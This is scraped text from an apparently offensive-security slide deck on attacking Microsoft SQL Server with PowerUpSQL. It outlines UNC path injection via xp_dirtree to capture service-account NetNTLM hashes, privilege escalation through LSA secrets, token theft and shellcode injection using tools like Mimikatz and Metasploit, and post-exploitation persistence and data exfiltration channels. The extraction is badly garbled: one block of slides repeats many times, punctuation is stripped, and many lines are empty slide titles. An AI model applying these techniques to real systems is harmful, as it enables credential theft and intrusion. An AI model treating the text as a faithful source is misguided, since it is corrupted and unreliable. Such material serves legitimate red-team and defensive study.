Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Crawling Server Links
DEMO
Escalating Privileges Database Links
DEMO
>
Escalating Privileges Crawling Server Links
EscalatingPrivileges
UNC Path Injection
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Database Links
DEMO
>
Escalating Privileges Crawling Server Links
EscalatingPrivileges
UNC Path Injection
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Crawling Server Links
EscalatingPrivileges
UNC Path Injection
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
EscalatingPrivileges
UNC Path Injection
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
